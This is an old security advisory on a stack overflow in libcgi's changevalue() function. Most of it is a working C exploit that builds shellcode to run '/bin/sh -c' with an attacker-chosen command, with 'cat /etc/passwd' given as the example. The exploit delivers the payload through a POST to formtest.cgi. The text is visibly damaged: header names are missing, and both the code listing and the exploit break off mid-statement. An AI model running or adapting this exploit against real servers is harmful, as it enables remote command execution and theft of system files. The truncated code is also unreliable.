======================================== INetCop Security Advisory #2002-0x82-007 ======================================== * Title: Remote Frame Pointer Overwrite vulnerability in libCGI (LIB CGI in Language C). 0x01. Description libcgi is a simple way to develop CGI programs in C. The libcgi package is a library written in pure C for C programmers, or programmers with some C experience, who want to write CGI programs in C. The project ships two libraries (libcgi, lib-mysql), each with example code showing how to use it. The vulnerability is at line 76 of 'Include/libcgi.h', inside changevalue(): buffer is a fixed 256-byte stack array, while size is taken from strlen(pt), the length of the string passed in, so the bound on the copy comes from the input rather than from the destination. (In this copy the listing is truncated after line 74, so the overflowing write on line 76 itself is not visible; the advisory title indicates it reaches the saved frame pointer, and the exploit below delivers the input through a POST to formtest.cgi.) Let's examine. :-) __ 69 void changevalue(char mt[],char *pt) 70 { 71 char buffer[256]={'\0'}; // 256 72 int size=(strlen(pt)); // pt size. 73 int x,y; 74 for(x=0,y=0;x ** ** LIB CGI in Language C - Testing "libcgi.h" with Url Encoding - ** by Marcos Luiz Onisto , bigadmin@uol.com.br ** ... ** 8282828282828282828282828282828282828282828282828282 ... ** ... ** ** Happy Exploit ! ** ** Linux testsub 2.2.12-20kr #1 Tue Oct 12 16:46:36 KST 1999 i686 unknown ** uid=99(nobody) gid=99(nobody) groups=99(nobody) ** ** __ ** exploit by "you dong-h0un"(Xpl017Elz), . ** My World: http://x82.i21c.net & http://x82.inetcop.org ** */ #include #include #define Xpl017Elz x82 #define BUFSIZE 1024 #define DCOMM "printf \"\\n\\n\\nHappy Exploit !\\n\\n\";uname -a;id" void banrl(); int main(argc,argv) int argc; char *argv[]; { #define NOPSH 0xbffffc20 unsigned long nopsh=NOPSH; #define SHADR 0xbffffd60 unsigned long shadr=SHADR; int whtp; #define NULLS 0x00000000 int num_0,num_1,num_2,num_3; int num_4,num_5; char input_code[]= /* It's true ! 
*/ "NAME=Xpl017Elz&EMAIL=szoahc@hotmail.com&HOME=http://x82.inetcop.org&SEL=Music&CHECK=yes&RADIO=very+happy&COMMENTS="; char send_code[]= "&Submit=Send\n"; /* send */ #define COMMS 235 char shc0mm[COMMS]=DCOMM; unsigned char x0x[BUFSIZE]; char x0x2[BUFSIZE]; int x0x_0_num=NULLS; int x0x_1_num=NULLS; num_5=num_4=num_3=num_2=num_1=num_0=NULLS; memset(x0x,0x00,BUFSIZE); memset(x0x2,0x00,BUFSIZE); while((whtp=getopt(argc,argv,"C:c:S:s:A:a:"))!=EOF) { switch(whtp) { case 'C': case 'c': if(strlen(optarg)>COMMS) { fprintf(stderr,"\n [-] String Error :-(\n\n"); exit(-1); } memset(shc0mm,0x00,COMMS); strncpy(shc0mm,optarg,COMMS); break; case 'S': case 's': nopsh=strtoul(optarg,NULL,0); break; case 'A': case 'a': shadr=strtoul(optarg,NULL,0); break; case '?': { (void)banrl(); fprintf(stderr,"\n Usage: %s -opt args\n",argv[0]); fprintf(stderr,"\n\t-s [addr] - shellcode"); fprintf(stderr,"\n\t-a [addr] - &shellcode"); fprintf(stderr,"\n\t-c [cmd] - command\n"); fprintf(stderr,"\n Example: %s -s %p -a %p -c 'cat /etc/passwd'\n\n",argv[0],nopsh,shadr); exit(0); } break; } } //--- make shellcode :-) ---// /* This is dong-h0un U style */ num_1=strlen(shc0mm)+0x0c; num_2=num_1+0x01; num_3=num_2+0x04; num_4=num_3+0x04; num_5=num_4+0x04; x0x[num_0++]=0xeb; x0x[num_0++]=0x30; x0x[num_0++]=0x5e; x0x[num_0++]=0x89; x0x[num_0++]=0x76; x0x[num_0++]=num_2; x0x[num_0++]=0x31; x0x[num_0++]=0xc0; x0x[num_0++]=0x88; x0x[num_0++]=0x46; x0x[num_0++]=0x08; x0x[num_0++]=0x88; x0x[num_0++]=0x46; x0x[num_0++]=0x0b; x0x[num_0++]=0x88; x0x[num_0++]=0x46; x0x[num_0++]=num_1;x0x[num_0++]=0x89; x0x[num_0++]=0x46; x0x[num_0++]=num_5;x0x[num_0++]=0xb0; x0x[num_0++]=0x0b; x0x[num_0++]=0x8d; x0x[num_0++]=0x5e; x0x[num_0++]=0x09; x0x[num_0++]=0x89; x0x[num_0++]=0x5e; x0x[num_0++]=num_3;x0x[num_0++]=0x8d; x0x[num_0++]=0x5e; x0x[num_0++]=0x0c; x0x[num_0++]=0x89; x0x[num_0++]=0x5e; x0x[num_0++]=num_4;x0x[num_0++]=0x89; x0x[num_0++]=0xf3; x0x[num_0++]=0x8d; x0x[num_0++]=0x4e; x0x[num_0++]=num_2; 
x0x[num_0++]=0x8d; x0x[num_0++]=0x56; x0x[num_0++]=num_5; x0x[num_0++]=0xcd; x0x[num_0++]=0x80; x0x[num_0++]=0x31; x0x[num_0++]=0xc0; x0x[num_0++]=0xb0; x0x[num_0++]=0x01; x0x[num_0++]=0xcd; x0x[num_0++]=0x80; x0x[num_0++]=0xe8; x0x[num_0++]=0xcb; x0x[num_0++]=0xff; x0x[num_0++]=0xff; x0x[num_0++]=0xff; x0x[num_0++]=0x2f; x0x[num_0++]=0x2f; x0x[num_0++]=0x62; x0x[num_0++]=0x69; x0x[num_0++]=0x6e; x0x[num_0++]=0x2f; x0x[num_0++]=0x73; x0x[num_0++]=0x68; x0x[num_0++]=0x20; x0x[num_0++]=0x2d; x0x[num_0++]=0x63; x0x[num_0++]=0x20; //--- execute formtest.cgi ---// fprintf(stdout,"POST /cgi-bin/formtest.cgi HTTP/1.0\n"); fprintf(stdout,"Connection: close\n"); fprintf(stdout,"User-Agent: "); //--- put shellcode ---// for(x0x_0_num=0;x0x_0_num